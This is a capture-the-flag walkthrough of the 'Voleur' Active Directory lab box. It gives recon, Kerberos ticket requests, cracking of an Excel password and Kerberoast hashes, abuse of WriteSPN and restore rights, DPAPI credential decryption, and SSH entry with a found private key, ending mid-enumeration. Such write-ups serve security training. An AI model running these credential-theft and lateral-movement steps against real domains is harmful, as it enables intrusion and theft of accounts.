Post

Voleur

Voleur

Breach Scenario

1
2
As is common in real life Windows pentests, you will start the Voleur box with credentials for the following account: 
ryan.naylor / HollowOct31Nyt

Recon

Nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
sudo nmap -PN -sC -sV -oN voleur 10.10.11.76
[sudo] password for kali: 
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-09 14:47 PKT
Stats: 0:00:02 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 1.60% done; ETC: 14:49 (0:02:03 remaining)
Nmap scan report for 10.10.11.76
Host is up (0.11s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-07-09 17:24:44Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
2222/tcp open  ssh           OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 42:40:39:30:d6:fc:44:95:37:e1:9b:88:0b:a2:d7:71 (RSA)
|   256 ae:d9:c2:b8:7d:65:6f:58:c8:f4:ae:4f:e4:e8:cd:94 (ECDSA)
|_  256 53:ad:6b:6c:ca:ae:1b:40:44:71:52:95:29:b1:bb:c1 (ED25519)
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC; OSs: Windows, Linux; CPE: cpe:/o:microsoft:windows, cpe:/o:linux:linux_kernel

Host script results:
| smb2-time: 
|   date: 2025-07-09T17:24:59
|_  start_date: N/A
|_clock-skew: 7h37m18s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.78 seconds

It’s better to ntpdate with the server to handle clock skew.

/etc/hosts

1
10.10.11.76     DC.voleur.htb   voleur.htb

At the same time it’s a good idea to setup your KRB5CONF.

SMB

user:pass auth isn’t supported on SMB. We will start by getting a TGT.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
sudo apt install krb5-user

kinit ryan.naylor@VOLEUR.HTB
Password for ryan.naylor@VOLEUR.HTB:

klist                       
Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: ryan.naylor@VOLEUR.HTB

Valid starting       Expires              Service principal
07/09/2025 23:23:44  07/10/2025 09:23:44  krbtgt/VOLEUR.HTB@VOLEUR.HTB
        renew until 07/10/2025 23:23:38
                                                                                                     
┌──(kali㉿vm-kali)-[~/htb/voleur]
└─$ export KRB5CCNAME=/tmp/krb5cc_1000

impacket-smbclient -k -no-pass voleur.htb/ryan.naylor@dc.voleur.htb
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

Type help for list of commands
# help

Shares

1
2
3
4
5
6
7
8
9
# shares
ADMIN$
C$
Finance
HR
IPC$
IT
NETLOGON
SYSVOL

IT, HR, Finance are interesting shares. We will enumerate them.

1
2
3
4
5
6
7
8
9
10
11
# use IT
# ls
drw-rw-rw-          0  Wed Jan 29 14:10:01 2025 .
drw-rw-rw-          0  Wed Jul  9 18:30:58 2025 ..
drw-rw-rw-          0  Wed Jan 29 14:40:17 2025 First-Line Support
# cd First-Line Support
# ls 
drw-rw-rw-          0  Wed Jan 29 14:40:17 2025 .
drw-rw-rw-          0  Wed Jan 29 14:10:01 2025 ..
-rw-rw-rw-      16896  Fri May 30 03:23:36 2025 Access_Review.xlsx
# get Access_Review.xlsx

On opening the excel sheet we are presented with a password.

JohnTheRipper

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
/usr/bin/office2john Access_Review.xlsx 
Access_Review.xlsx:$office$*2013*100000*256*16*a80811402788c037b50df976864b33f5*500bd7e833dffaa28772a49e987be35b*7ec993c47ef39a61e86f8273536decc7d525691345004092482f9fd59cfa111c

└─$ cat excel.hash 
$office$*2013*100000*256*16*a80811402788c037b50df976864b33f5*500bd7e833dffaa28772a49e987be35b*7ec993c47ef39a61e86f8273536decc7d525691345004092482f9fd59cfa111c
                                                                                                      
┌──(kali㉿vm-kali)-[~/htb/voleur]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt excel.hash --format=office
Warning: invalid UTF-8 seen reading /usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Office, 2007/2010/2013 [SHA1 128/128 SSE2 4x / SHA512 128/128 SSE2 2x AES])
Cost 1 (MS Office version) is 2013 for all loaded hashes
Cost 2 (iteration count) is 100000 for all loaded hashes
Will run 3 OpenMP threads
Proceeding with wordlist:/usr/share/john/password.lst
Press 'q' or Ctrl-C to abort, almost any other key for status
football1        (?)     
1g 0:00:00:17 DONE (2025-07-09 23:48) 0.05810g/s 119.2p/s 119.2c/s 119.2C/s google..emmanuel
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

football1 for excel sheet.

alt text

svc_ldap:M1XyC9pW7qT5Vn svc_iis:N5pXyW1VqM7CZ8

To winrm we will requrire lacey account.

Bloodhound

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
sudo neo4j console
bloodhound

bloodhound-python --dns-tcp -ns 10.10.11.76 -d voleur.htb -u 'ryan.naylor' -p 'HollowOct31Nyt' -c all
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: voleur.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.voleur.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.voleur.htb
INFO: Found 12 users
INFO: Found 56 groups
INFO: Found 2 gpos
INFO: Found 5 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.voleur.htb
WARNING: DCE/RPC connection failed: [Errno Connection error (10.10.11.76:445)] timed out
WARNING: DCE/RPC connection failed: [Errno Connection error (10.10.11.76:445)] timed out
WARNING: DCE/RPC connection failed: [Errno Connection error (10.10.11.76:445)] timed out
WARNING: DCE/RPC connection failed: The NETBIOS connection with the remote host timed out.
WARNING: DCE/RPC connection failed: [Errno Connection error (10.10.11.76:445)] timed out
INFO: Done in 01M 43S

WriteSPN

svc_ldap has WriteSPN over svc_winrm. It can be abused using targetedKerberoast. It also is a member of Restore_Users which has GenericWrite over lacey.miller. We can also abuse it with targetedKerberost or pywhisker.

Let’s grab the tool.

TargetedKerberoast

Credentials won’t suffice. Kerberos ticket is required, we will get TGT.

1
2
3
4
5
6
7
8
impacket-getTGT voleur.htb/svc_ldap:M1XyC9pW7qT5Vn -k 
/home/kali/htb/voleur/targetedKerberoast/.venv/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
  import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in svc_ldap.ccache

export KRB5CCNAME=svc_ldap.ccache
1
2
3
4
5
6
git clone https://github.com/ShutdownRepo/targetedKerberoast.git

python3 -m venv .venv    
                                                                                                      
┌──(kali㉿vm-kali)-[~/htb/voleur/targetedKerberoast]
└─$ source .venv/bin/activate

Before using the script we must make some changes:

1
2
3
4
5
6
7
8
9
10
11
12
13
def get_machine_name(dc_ip, domain):
    if dc_ip is not None:
        s = SMBConnection(dc_ip, dc_ip)
    else:
        s = SMBConnection(domain, domain)
    try:
        s.login('', '')
    except Exception:
        if s.getServerName() == '':
            raise Exception('Error while anonymous logging into %s' % domain)
    else:
        s.logoff()
    return s.getServerName()

Since our Machine isn’t really allowing SMB connection this way, we will just return the name directly:

1
2
def get_machine_name(dc_ip, domain):
    return 'dc.voleur.htb'
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
└─$ KRB5CCNAME=svc_ldap.ccache python3 targetedKerberoast.py -v -d 'voleur.htb' -u 'svc_ldap' -p 'M1XyC9pW7qT5Vn' -k
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (lacey.miller)
[+] Printing hash for (lacey.miller)
$krb5tgs$23$*lacey.miller$VOLEUR.HTB$voleur.htb/lacey.miller*$253f25286b2b6cc2b9a627dc0d40fd1a$bb526624e78581fca246bdbcc5555a6099b42281c257d75a5b16dec4e2cdeaeb9fdbcfb03dd420e086a08f2bb22de5a94a3a11e8b7eb7357c2f28c597700b575557837a68383dccdf13713545cd7ee082b1c546810f280dc0054ae8968bb0ae1e995c3487218d9a09b1b12e7117a95f7c45fcb500ec39ba6ebaa5e6243f8a041ab74a761a4243addbed005959d099d7d5f8db347832f20ebdd2cf8aa0747c7150ed5f390c6ac8ec80b2da3ffe87d6aace28e10520eb13b1efac32a7333f47ff7ba31a57d12c1c1d265c535d62e88df120dea75ad7c7111dd7b4639d0b60828d30cae0c4fa9e749a0ba2f50e780234557cfd447e620afff583e835ba9f7ca22b9bbf0384f7e1cc26651ac7d324ce942713c4af38184f3256feb55d8eb03d7a66c5ad803a2ec5a8aa22fbb71150247cf63e2b3e76ba40aaeddd2af43623eddf0a158d307bfdd303af651fceda2427bc94fd58b1ad3a308d973046affe3e2248e2d7c982e1e1a9e331bdb637f498e53787974a16f3eae70f82428eb36bc5ff3fd4b79cc6bf99dd6aa00ab59ae29d626d0c94912ed301d0977ca3eb86d5ae2fecc4ee192f5de40f503f481cf417c9b05e452f199f21db17aff9dc2091849589952cf35a5d8ab5f268c88c5334b74c42233d13e9e94b7a213b58f42566bd22c425526f6c29d7b33027853137a8e1e6314b2836145e5b35e5f43c8235f6ac8747733ee7fad2a78a799b10c291ac9118a226ce8d36965ac15455e65f7eedea274c6a08929abc1c90910261d405c98879b51101ccd65a1059cc422908b93782574900051f0ffc4e85581ed3e5208ab44266a202437fa767ccdb6787bcbce57191ded5e15e7a6517f4728330239262cc937b31775727ae102eb40fc48778bc730326faf669365cb4ad3a4ac151db0efad3c233a087890409d64bdfa9cbcc7e4cd5c03e056c9d945807b7376221c4bd07575062b8a72e26cf40a10c251333c50fa5746cb99d820c1f76e228d1a2ba81b1f664c881c03b738c7bb2483bcea9b255e3cc47157c6ac388ac216d37c2f88cab6d76ae285c294abcd069fac59a7e82ceafee2cd72d73b31f3a628e8ed1f3c1f15fece3deb95b6b4a8f91e52d9491217eefd3dde7d982ff2c0fb9820d8537ef22d50017d45b0d989fea6e66bc2e403e2b66210c0d1bc4107d076e237006035fd135b86d0e6bf0e529b2e91aa2c5f6bc08f2a3801d0fb95bb4e7c33551bdd21a738f7656498eb0448465107240b2c50b0b7dd642748895b39f89b13f879368445a823fc59aee27a4511a95ba2db57e6b2dcdb83f1a8e02498ad85baf947da346f716b1baa025837c7d0afb455461dcc93cdcc928a70692ff865d02bf7aa7c6b08905dd115d056fc472d2d7cecaff93fcfcf13338f04c976a436f3b7530edef39d2e2fdb1809bf6509f652f474c0a02ddd43ba0812d9046e3e36b1cc11852e65efc0c2759c7a59d141
[VERBOSE] SPN removed successfully for (lacey.miller)
[VERBOSE] SPN added successfully for (todd.wolfe)
[+] Printing hash for (todd.wolfe)
$krb5tgs$23$*todd.wolfe$VOLEUR.HTB$voleur.htb/todd.wolfe*$d6788068634162afad99e0ee16ffa151$3a22b2cc275fc3c3d50314decf555f9140889cb51bff1d98611ed4d743aabcb2459ee3e9126c3bc5138810913bfbe24a991e50b7d33c7d476cfc56029f9d0e2ce27f54e37d801d86fda0d297ee245b81b9ba6957cf2275a42cdb30f17caa6eaf494cd4760faefffc5f02e794f1d130cbed9c9ae649641577d319b3ddb55f4915c1575c0487869ae6461a157ead9581352fe746765c5e5645eb6006d72bc32aa52c244507fb6a0103ccd7d628955184ec87515bca6f34d1c9785d10ce957dc01d158b42288f16b738b31ee6ea08816e47b1145fb335b11317c55a5dbc6045832ad2b20f2b709558f86aaa7bec61ca16ab496917aba005d88240dd60b0c1299e8b6a8c5289945fb676dac3e4c40c5a1e4f594665b2adcc7daa45971928230ebfbca912f2bd31549ee75291b1cd5cfb994fdb3b0993639eb113ecccd7c45635d936c9d61df17d6abd7babfdccb154d401fa695a7e29aa6d63590cddf906cf139f2f4d92444593f5588dba1acae5023c6548e720ae40a5d73366e587e5c241004c82df31c90cd4540df199a981fbe3c528eeadeb0230d3fd952c9ced8ea75e8503ed0a4478fbfe61fed18138eb8e3b91043abac59d554f111f7b97762012f33fe27f1aecc981aabfab4c71b5f2735c880fb7bfd2065959dd5f0018e13caf8b072d54b374e0da3425471e45c531a5ecada4c3d41a27c3982c7967a48170d439d02dd8a6fe0ceb415cfb9e414ad7e87892481de1a9834eb6d9c8b625b16f210bf1b53865eab95d091e113c1fc61778ed04cb19d6f1adf181bc429c52efe667df06f26e9548bd3f1b24646429b8935d002c6be2cd22dfed5aa1baf0bfda148098b3e4a7136ad64b31e9ca564d07b9407f67cf573dff3fc0a3815b0795576f479b5c8de0830bacedb7f86fd247e4ae53729b862b75f1dcf9e9e5fa14266c70b417c0a5a8be25497fb71fbdb84acc1bf3ca0a5dba03ae0ab0930fff78d3aa77fa0f86f6e845039906cbb8fbb79ba89dfbfb4d3b11b7a8fc85e0140bd08c5d59c7f0392ba1f7f2b160819c848479199c0791e33c679346e43b15a395cf863f629875e78e62e2a71d04a805b8a336cc12d64a4f0d14bcb46be2c56dfc98c031701276c8538306d069dfa2d1a560bf160f593a3f4d25d211a190963dfae7f4b2195aa3a000b1aab858b49b588e80ca3645e8746ed826da7827fb0f381fd7b6c73b84ddf0913d24ef48dd9a17b162b046841d3fcf79125fb834252cb365f2eda48e3d5cddf919a18cdb81b84d7c8a4207d41a986388014c182a61b44b3a70a06c4a00a9a0ff14e58897ae16ee1a3d8b3dc63f968a56b158771693b1f4324834a69284f38b8d57b75c166ca6223cee931bb53fd62413f9082af65c737d37085cea71989b86c6e2efd924e509336ee0e80be42b45bbb0e25de773553210b8069c83b4c637d2692541922493bced13a832013979e9d18998b63653
[VERBOSE] SPN removed successfully for (todd.wolfe)
[VERBOSE] SPN added successfully for (svc_winrm)
[+] Printing hash for (svc_winrm)
$krb5tgs$23$*svc_winrm$VOLEUR.HTB$voleur.htb/svc_winrm*$53b684f58ae66d59931dac78f7b5dc78$69c7f335ba353e4d99cda919cbbbe4f4bd293c9d756fafa69fa7db6839b9350a7bc466ba958aba96ed3f44db1b720250172d07625e050210c0e95200f31802de93f361476f4ace84d3bebbe172dae02083d5a1aeaa08bc3853f89812baac4653ac3f992afe4883a59ba115d616aa1caa8262d0c0685a00a1a1cfd408affacb0deb75608a1feb77e32f6c4a848a1af6bd3603cf183c2fe76e964c1207daeb346b9ac5c3989507676f783d924ab74e454e3ff9e590aad1c354eee6fc8875fe1d2e10953d174d9d3edacaa6abbb4520b441621861d84f83afd2578e287eb1c24f7d9d991c2e44d42293384b3ad750e36db050b913dd9707f69e1a3392366770979eeab2d9336ba6d502c6b833dbaf689de78f7297fdea76a235bab6c0f997e75f86e402aa59a39e18520ff6b33784aaed984110dbb875dd29c4b2d9348b2301d1b29f91ed8b5d5f4eb90cd953a0c6a9466a62eba766c03342b81518d691c32dd5e30e85cad33d9d4ac917e67db022f4df51c83cb296795de09bad1cdd41b321b0031dc97120dbb584fd5e3ae4a0bf2500d6aaa121cd97b2837c5156b7a704452f8fd3b945cf7f911a30b409d6df4e59ab5f9aea804b16e6d0480e89cfe2485290668c5e6d947b08f7d253112e261da5eec74c74fa12b632f2e9f9262041d41d09f99d3fab8bea2ec7f11ca44fdb53e0a70bfed652f458f5f45fae9efb97af5deab2ec75e299048902fa14faf89b71ef0fa4fafcff0c951d3dc3e2211bb2c0932af052b7feb6efbea3a841ffc3f8ac8312a2930cc61e3769ef9345ce8ddcfb5bc057fe1ad2d6994e0ef39933ebaf9550ce3f50272d609125ce3f48250818c75248c399e0738c6065b1032e7f766689f66b25fb1e2b4b051b89f1d01c9fb52d9231ed8de6e5ce5f28ef0dc2d6a5b2ec591b09a2006df56bc35b63cc33e6f97805453747e763b124f17821ae8a8442a9641ab9baa08d1705dee24e53d430dbe5d8fa3b0dbb7463da852ddd6fbc5d18e9eec39188bb5cfaab14dbc95227df4232aea6a634a2d0264f3237c32d6c2dbb76015e4cd7b2bea8c0f34afde3e0ac8a7a1849c6ef3ab2fb3ba4a0b276f639eb0463d1775f8c6cc968bff7ed608293b7f646ebef50157797ea73628e134e22fb14539740e733346fcfcaa81f4879e72baec112decbdcae966f8b2ac35b4002822dd27a3b7fb80f2243e514b44e32af9cb3d6b8d9457abae5b95288dae49d86eaf7a60cd636050d86757bbc5ab438854cd42dfa2d6bd9da6edcfc54d468c85da76fe92560a5f9e986fc81ae382a45d81e15b83d9c0317f55f064ad6b21a63dcf4a05811f06a1898a2d905461246b9f1a11156f436d8ec2272f4b1b869eb56b5ef20db1d7ab2af62ce28f304297a3cfe51685214a386bc52e8d7419fc2a7ecff8bde2b1e7541b8011938644586fa2e9505a5e38125ed121d909c0b503b99627adc25c00b5ff0285e
[VERBOSE] SPN removed successfully for (svc_winrm)

Let’s crack the hashes.

Foothold

JohnTheRipper again

1
2
3
4
5
john --list=formats | grep krb5                                                  
414 formatskeyring, keystore, known_hosts, krb4, krb5, krb5asrep, krb5pa-sha1, krb5tgs, 
 (149 dynamic formats shown as just "dynamic_n" here)
krb5-17, krb5-18, krb5-3, kwallet, lp, lpcli, leet, lotus5, lotus85, LUKS, 
mscash2, MSCHAPv2, mschapv2-naive, krb5pa-md5, mssql, mssql05, mssql12, 

svc_winrm

1
2
3
4
5
6
7
8
9
john --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt svc_winrm.hash   
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
AFireInsidedeOzarctica980219afi (?)     
1g 0:00:00:05 DONE (2025-07-10 00:41) 0.1886g/s 2164Kp/s 2164Kc/s 2164KC/s AG156228..AEGIES
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

svc_winrm: AFireInsidedeOzarctica980219afi

evil-winrm as svc_winrm

1
2
3
4
5
6
7
8
9
10
impacket-getTGT voleur.htb/svc_winrm:AFireInsidedeOzarctica980219afi -k
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in svc_winrm.ccache
                                                                                                                           
┌──(kali㉿vm-kali)-[~/htb/voleur]
└─$ export KRB5CCNAME=svc_winrm.ccache                                           
                                                                                                                           
┌──(kali㉿vm-kali)-[~/htb/voleur]
└─$ KRB5CCNAME=svc_winrm.ccache evil-winrm -i dc.voleur.htb -u svc_winrm -r voleur.htb

Privilege Escalation

Now that we have user flag we can move onto priv escalation. svc_ldap has GenericWrite over lacey.miller, but it doesn’t seem like it leads to much. What’s interesting is:

1
2
3
4
5
6
7
8
9
10
*Evil-WinRM* PS C:\Users\svc_winrm\Desktop> dir 


    Directory: C:\Users\svc_winrm\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         1/29/2025   7:07 AM           2312 Microsoft Edge.lnk
-ar---          7/9/2025  12:23 PM             34 user.txt

The existence of Microsoft Edge. But the current user doesn’t really have any Edge credentials.

Restoring Todd

We weren’t able to crack lacey hash. But we already have todd’s password.

1
2
KRB5CCNAME=../svc_ldap.ccache python3 bloodyAD.py --host dc.voleur.htb --dc-ip 10.10.11.76 -k set restore todd.wolfe
[+] todd.wolfe has been restored successfully under CN=Todd Wolfe,OU=Second-Line Support Technicians,DC=voleur,DC=htb

todd.wolfe:NightT1meP1dg3on14

Get his TGT as well:

1
2
3
4
impacket-getTGT voleur.htb/todd.wolfe:NightT1meP1dg3on14 -k
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in todd.wolfe.ccache

SMB as Todd

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
RB5CCNAME=todd.wolfe.ccache impacket-smbclient -k -no-pass voleur.htb/todd.wolfe@dc.voleur.htb 
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

Type help for list of commands
# shares
ADMIN$
C$
Finance
HR
IPC$
IT
NETLOGON
SYSVOL
# use IT
# ls
drw-rw-rw-          0  Wed Jan 29 14:10:01 2025 .
drw-rw-rw-          0  Tue Jul  1 02:08:33 2025 ..
drw-rw-rw-          0  Wed Jan 29 20:13:03 2025 Second-Line Support
# 

Some interesting directories on doing tree:

1
2
3
4
5
6
7
8
9
10
/Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Credentials
/Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Crypto
/Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Internet Explorer
/Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Network
/Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Protect
/Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Spelling
/Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/SystemCertificates
/Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Vault
/Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Windows
/Second-Line Support/Archived Users/todd.wolfe/AppData/Local/Microsoft/Credentials/DFBE70A7E5CC19A398EBF1B96859CE5D
1
2
3
4
5
6
7
8
/Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Credentials/772275FAD58525253490A9B0039791D3
/Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Crypto/Keys
/Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Crypto/RSA
/Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Internet Explorer/Quick Launch
/Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Internet Explorer/UserData
/Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Network/Connections
/Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Protect/CREDHIST
/Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Protect/S-1-5-21-3927696377-1337352550-2781715495-1110

dpapi

Masterkey

I went throught the previously collected user SID and can confirm the one we found S-1-5-21-3927696377-1337352550-2781715495-1110 is todd’s. A blob parsing tool (dpapi) is required to crack the MasterKey (/Microsoft/Protect/S-1-5-21-3927696377-1337352550-2781715495-1110/08949382-134f-4c63-b93c-ce52efc0aa88) we found.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
impacket-dpapi masterkey -file 08949382-134f-4c63-b93c-ce52efc0aa88 -sid S-1-5-21-3927696377-1337352550-2781715495-1110 -password NightT1meP1dg3on14
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[MASTERKEYFILE]
Version     :        2 (2)
Guid        : 08949382-134f-4c63-b93c-ce52efc0aa88
Flags       :        0 (0)
Policy      :        0 (0)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)

Decrypted key with User Key (MD4 protected)
Decrypted key: 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83

Credentials

Now using this masterkey we can crack the credentials that we found under /Microsoft/Credentials/.

1
2
3
4
5
6
7
8
9
10
11
12
13
impacket-dpapi credential -file 772275FAD58525253490A9B0039791D3 -key 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[CREDENTIAL]
LastWritten : 2025-01-29 12:55:19+00:00
Flags       : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist     : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type        : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
Target      : Domain:target=Jezzas_Account
Description : 
Unknown     : 
Username    : jeremy.combs
Unknown     : qT3V9pLXyN7W4m

jeremy.combs:qT3V9pLXyN7W4m

SMB as jeremy

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
impacket-getTGT voleur.htb/jeremy.combs:qT3V9pLXyN7W4m -k         
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in jeremy.combs.ccache
                                                                                                                                 
┌──(kali㉿vm-kali)-[~/htb/voleur]
└─$ export KRB5CCNAME=jeremy.combs.ccache 
                                                                                                                                 
┌──(kali㉿vm-kali)-[~/htb/voleur]
└─$ impacket-smbclient -k -no-pass voleur.htb/jeremy.combs@dc.voleur.htb
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

Type help for list of commands
# shares
ADMIN$
C$
Finance
HR
IPC$
IT
NETLOGON
SYSVOL
# use IT
# ls
drw-rw-rw-          0  Wed Jan 29 14:10:01 2025 .
drw-rw-rw-          0  Thu Jul 10 06:28:26 2025 ..
drw-rw-rw-          0  Thu Jan 30 21:11:29 2025 Third-Line Support

# cd Third-Line Support
# ls
drw-rw-rw-          0  Thu Jan 30 21:11:29 2025 .
drw-rw-rw-          0  Wed Jan 29 14:10:01 2025 ..
-rw-rw-rw-       2602  Thu Jan 30 21:11:29 2025 id_rsa
-rw-rw-rw-        186  Thu Jan 30 21:07:35 2025 Note.txt.txt

Well I see an SSH key. The system also had port 2222 exposed. We might potentially be able to get SSH? Let’s get both files.

Notes.txt.txt

1
2
3
4
5
6
7
8
9
10
cat Note.txt.txt                        
Jeremy,

I've had enough of Windows Backup! I've part configured WSL to see if we can utilize any of the backup tools from Linux.

Please see what you can set up.

Thanks,

Admin 

Looking at bloodhound results, there was a svc_backup account as well. The ssh key will probably be for that account.

ssh as svc_backup

1
2
3
4
chmod 600 id_rsa    

┌──(kali㉿vm-kali)-[~/htb/voleur]
└─$ ssh -i id_rsa svc_backup@10.10.11.76 -p 2222

Well I made a blunder ls -laR /, but it lead me to discover that we have a mounted volume!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
svc_backup@DC:/mnt/c$ ls -la
ls: cannot access 'DumpStack.log.tmp': Permission denied
ls: cannot access 'pagefile.sys': Permission denied
ls: PerfLogs: Permission denied
ls: 'System Volume Information': Permission denied
total 0
drwxrwxrwx 1 svc_backup svc_backup 4096 Jan 30 03:39 '$Recycle.Bin'
dr-xr-xr-x 1 svc_backup svc_backup 4096 Jun 30 14:08 '$WinREAgent'
drwxrwxrwx 1 svc_backup svc_backup 4096 Jul  9 18:28  .
drwxr-xr-x 1 root       root       4096 Jan 30 03:46  ..
lrwxrwxrwx 1 svc_backup svc_backup   12 Jan 28 20:34 'Documents and Settings' -> /mnt/c/Users
-????????? ? ?          ?             ?            ?  DumpStack.log.tmp
dr-xr-xr-x 1 svc_backup svc_backup 4096 Jan 29 01:10  Finance
dr-xr-xr-x 1 svc_backup svc_backup 4096 Jan 29 01:10  HR
dr-xr-xr-x 1 svc_backup svc_backup 4096 Jan 29 01:10  IT
d--x--x--x 1 svc_backup svc_backup 4096 May  8  2021  PerfLogs
dr-xr-xr-x 1 svc_backup svc_backup 4096 Jan 30 06:20 'Program Files'
dr-xr-xr-x 1 svc_backup svc_backup 4096 Jan 30 05:53 'Program Files (x86)'
drwxrwxrwx 1 svc_backup svc_backup 4096 Jun  4 15:34  ProgramData
dr-xr-xr-x 1 svc_backup svc_backup 4096 Jan 28 20:34  Recovery
d--x--x--x 1 svc_backup svc_backup 4096 Jan 30 03:49 'System Volume Information'
dr-xr-xr-x 1 svc_backup svc_backup 4096 Jan 30 03:38  Users
dr-xr-xr-x 1 svc_backup svc_backup 4096 Jun  5 12:53  Windows
dr-xr-xr-x 1 svc_backup svc_backup 4096 May 29 15:07  inetpub
-????????? ? ?          ?             ?            ?  pagefile.sys
drwxrwxrwx 1 svc_backup svc_backup 4096 Jul  9 18:28  tools

Seems like jeremy didn’t have access to everything on the smb share:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
svc_backup@DC:/mnt/c$ ls -la IT/Third-Line\ Support/
total 4
dr-xr-xr-x 1 svc_backup svc_backup 4096 Jan 30 08:11 .
dr-xr-xr-x 1 svc_backup svc_backup 4096 Jan 29 01:10 ..
drwxrwxrwx 1 svc_backup svc_backup 4096 Jan 30 08:11 Backups
-r-xr-xr-x 1 svc_backup svc_backup  186 Jan 30 08:07 Note.txt.txt
